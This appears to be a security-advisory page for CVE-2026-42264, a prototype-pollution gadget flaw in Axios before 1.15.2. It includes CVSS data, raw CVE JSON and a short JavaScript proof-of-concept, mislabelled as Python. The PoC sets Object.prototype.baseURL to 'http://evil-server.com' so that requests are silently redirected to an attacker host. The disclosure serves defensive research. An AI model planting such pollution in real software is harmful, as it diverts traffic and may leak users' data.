Security Vulnerability Report
中文
CVE-2026-42264 CVSS 7.4 HIGH

CVE-2026-42264

Published: 2026-05-08 04:16:20
Last Modified: 2026-05-08 16:02:14
Source: [email protected]

Description

Axios is a promise based HTTP client for the browser and Node.js. From version 1.0.0 to before version 1.15.2, fFive config properties (auth, baseURL, socketPath, beforeRedirect, and insecureHTTPParser) in the HTTP adapter are read via direct property access without hasOwnProperty guards, making them exploitable as prototype pollution gadgets. When Object.prototype is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request. This issue has been patched in version 1.15.2.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Axios >= 1.0.0, < 1.15.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Simulate prototype pollution by another dependency Object.prototype.baseURL = "http://evil-server.com"; // Vulnerable Axios usage (version < 1.15.2) const axios = require('axios'); // Intended to request https://api.example.com/user axios.get('/user', { baseURL: 'https://api.example.com' }).then(response => { // Actually requests http://evil-server.com/user // because Object.prototype.baseURL overrides the config console.log('Data:', response.data); }).catch(err => { console.error(err); }); // Cleanup for demonstration delete Object.prototype.baseURL;

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42264", "sourceIdentifier": "[email protected]", "published": "2026-05-08T04:16:20.313", "lastModified": "2026-05-08T16:02:14.343", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Axios is a promise based HTTP client for the browser and Node.js. From version 1.0.0 to before version 1.15.2, fFive config properties (auth, baseURL, socketPath, beforeRedirect, and insecureHTTPParser) in the HTTP adapter are read via direct property access without hasOwnProperty guards, making them exploitable as prototype pollution gadgets. When Object.prototype is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request. This issue has been patched in version 1.15.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1321"}]}], "references": [{"url": "https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa", "source": "[email protected]"}, {"url": "https://github.com/axios/axios/pull/10779", "source": "[email protected]"}, {"url": "https://github.com/axios/axios/releases/tag/v1.15.2", "source": "[email protected]"}, {"url": "https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj", "source": "[email protected]"}, {"url": "https://github.com/axios/axios/security/advisories/GHSA-q8qp-cvcw-x6jj", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.